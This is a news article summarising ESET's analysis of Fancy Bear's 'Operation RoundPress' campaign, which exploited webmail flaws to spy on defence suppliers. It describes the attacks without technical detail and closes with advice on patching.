Fancy Bear attacks companies using Soviet-era hacking techniques via compromised webmail software
The notorious Russian hacking group Fancy Bear, also known by names such as APT28, Sednit, or Strontium, has carried out targeted cyberattacks against defense contractors supplying weapons to Ukraine. This is according to a recent analysis by the Slovakian IT security firm ESET. The attacks specifically targeted manufacturers of Soviet military technology in Ukraine, Bulgaria, and Romania. Companies in Africa and South America were also targeted.
Fancy Bear has been known for years for its large-scale espionage campaigns and is believed to be a tool of Russian intelligence services. Among other things, the group was responsible for the 2015 attack on the German Bundestag, the 2016 attack on Hillary Clinton during the U.S. presidential campaign, and the 2023 attack on the SPD headquarters. Its goal: to steal information, spread disinformation, and promote geopolitical destabilization.
Target: Outdated webmail systems
As part of the “Operation RoundPress” campaign, the hacker group exploited known vulnerabilities in popular webmail software, including Roundcube, Horde, Zimbra, and MDaemon. In many cases, regular security updates could have closed these gaps. In at least one case, however, a previously unknown vulnerability in MDaemon was exploited, for which no patch was initially available.
The attack was typically carried out via malicious emails disguised as legitimate news reports, such as those purporting to be from well-known media outlets like the Kyiv Post or News.bg. As soon as the email was opened in a browser, hidden malicious code activated without the user having to click anything. Spam filters were unable to block these malicious messages.
2FA bypassed: Malware in action
ESET researchers identified the malware used as “SpyPress.MDAEMON.” This malware is capable of comprehensively compromising email accounts, including stealing login credentials and intercepting messages. Particularly alarming: In several cases, two-factor authentication (2FA) was also successfully bypassed. Using so-called application passwords, the attackers were able to secure long-term access to email accounts.
“Many companies run their webmail systems on outdated software,” warns Matthieu Faou of ESET. “Often, simply opening a malicious email in a browser—without even clicking on it—is enough for malicious code to be executed.”
Conclusion
This case once again highlights the importance of regular security updates, up-to-date patch management, and securing email systems—especially for companies in security-critical sectors. Outdated infrastructure is an open gateway for state-sponsored cyber actors such as Fancy Bear.